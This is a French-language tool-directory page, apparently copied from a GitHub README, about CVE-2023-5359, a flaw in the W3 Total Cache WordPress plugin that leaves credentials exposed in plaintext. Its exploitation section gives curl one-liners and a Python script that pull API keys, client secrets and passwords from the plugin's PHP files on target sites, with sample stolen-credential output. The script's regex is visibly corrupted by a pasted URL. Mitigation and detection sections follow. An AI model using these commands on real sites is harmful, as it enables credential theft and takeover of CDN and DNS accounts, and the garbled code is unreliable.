Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-5359 — CVE-2023-5359 - Scanner de vulnérabilité de stockage en texte clair W3 Total Cache. Détecte les informations d'identification exposées dans les versions du plugin W3 Total Cache ≤ 2.7.5. | Kitploit
Outils/GitHubGitHub/enzocipher/cve-2023-5359
Scanners de VulnérabilitésAttaques de Mots de PasseExploitationCollecte d'InformationsSécurité WebApprentissage et Éducation
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

CVE-2023-5359 - Scanner de vulnérabilité de stockage en texte clair W3 Total Cache. Détecte les informations d'identification exposées dans les versions du plugin W3 Total Cache ≤ 2.7.5.

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-5359 - Vulnérabilité de stockage en texte clair de W3 Total Cache

Description

CVE-2023-5359 est une vulnérabilité de stockage en texte clair affectant le plugin WordPress W3 Total Cache dans les versions ≤ 2.7.5. Cette vulnérabilité permet à des attaquants distants d'accéder à des informations d'identification sensibles stockées dans des fichiers PHP non chiffrés et accessibles publiquement.

Sévérité

  • Score CVSS : 7.5 (Élevé)
  • Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • Type : Exposition d'informations sensibles

Vulnérabilité technique

Cause racine

W3 Total Cache stocke les paramètres de configuration et les identifiants API dans des fichiers PHP situés dans le répertoire /wp-content/plugins/w3-total-cache/ sans protection adéquate. Ces fichiers sont accessibles via HTTP, exposant :

  • Clés API (CloudFlare, Google, etc.)
  • Secrets client
  • Jetons OAuth
  • Identifiants de services externes

Fichiers concernés

root@kitploit:~
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

Exploitation

Méthode manuelle

root@kitploit:~
# Vérifier si W3 Total Cache est installé
curl -s https://target.com/ | grep "w3-total-cache"

# Extraire les identifiants CloudFlare
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Rechercher dans tous les fichiers vulnérables
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

Script automatisé

root@kitploit:~
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
    if credentials:
        print(f"[!] Identifiants trouvés dans {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

Impact

Un attaquant peut obtenir :

  1. Identifiants CloudFlare — Prendre le contrôle du CDN et du DNS
  2. Clés API pour services externes — Accéder à des comptes externes
  3. Jetons OAuth — Usurper une identité
  4. Configurations du cache — Manipuler le contenu servi

Atténuation

Solution immédiate

  1. Mettez à jour vers W3 Total Cache ≥ 2.7.6
  2. Restreignez l'accès aux fichiers PHP du répertoire des plugins
  3. Révoquez et regénérez tous les identifiants exposés

Configuration sécurisée

root@kitploit:~
# Protection .htaccess
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

Détection

Commande de vérification

root@kitploit:~
# Vérifier la version vulnérable
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

Indicateurs de compromission

  • Activité inhabituelle dans les API externes
  • Modifications des configurations CloudFlare
  • Trafic provenant d'IP non autorisées vers les services connectés

Exemple de résultat

root@kitploit:~
[*] Scan : https://example.com
[+] W3 Total Cache détecté
[+] Fichier accessible : /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] IDENTIFIANTS TROUVÉS :
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

Références

  • CVE-2023-5359
  • Journal des modifications de W3 Total Cache
  • Équipe de sécurité WordPress

Avis juridique

Ce dépôt est destiné à des fins éducatives et aux tests de pénétration autorisés uniquement. Toute utilisation malveillante de ces informations est strictement interdite.


Ces informations vous ont-elles été utiles ? Mettez une étoile au dépôt !

Dernière mise à jour : novembre 2025

Télécharger l’outil